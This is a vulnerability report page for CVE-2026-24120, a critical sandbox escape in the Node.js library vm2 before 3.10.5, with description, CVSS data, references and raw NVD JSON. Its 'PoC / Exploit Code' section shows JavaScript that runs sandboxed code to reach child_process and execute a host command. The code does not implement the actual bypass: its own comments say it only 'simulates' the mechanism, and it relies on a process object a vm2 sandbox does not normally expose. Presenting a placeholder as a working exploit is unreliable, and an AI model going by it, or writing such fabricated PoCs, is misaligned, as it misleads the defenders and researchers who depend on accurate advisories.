Security Vulnerability Report
CVE-2026-24120 CVSS 9.8 CRITICAL

Published: 2026-05-04 17:16:22
Last Modified: 2026-05-08 19:30:00

Description

vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE
vm2 < 3.10.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const {VM} = require('vm2');
const vm = new VM();

// PoC demonstrating the sandbox escape concept
// This exploits the insufficient fix for CVE-2023-37466
const maliciousCode = `
  // Step 1: Trigger the logic flaw in the sandbox
  // (Specific implementation depends on the bypass technique)
  const exception = new Error();

  // Step 2: Manipulate the internal structure to leak the host object
  // This simulates the bypass mechanism
  const host = process.mainModule.require('child_process');

  // Step 3: Execute arbitrary command on the host
  host.execSync('whoami').toString();
`;

try {
  console.log(vm.run(maliciousCode));
} catch (e) {
  console.log('Exploit failed or patched:', e);
}

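References

https://github.com/patriksimek/vm2/releases/tag/v3.10.5 (Release Notes)
https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p (Exploit, Vendor Advisory)
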
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-24120", "sourceIdentifier": "[email protected]", "published": "2026-05-04T17:16:21.813", "lastModified": "2026-05-08T19:29:59.830", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-693"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "3.10.5", "matchCriteriaId": "E0187C39-B05F-4D67-9B5D-7CBAA800A126"}]}]}], "references": [{"url": "https://github.com/patriksimek/vm2/releases/tag/v3.10.5", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Vendor Advisory"]}]}}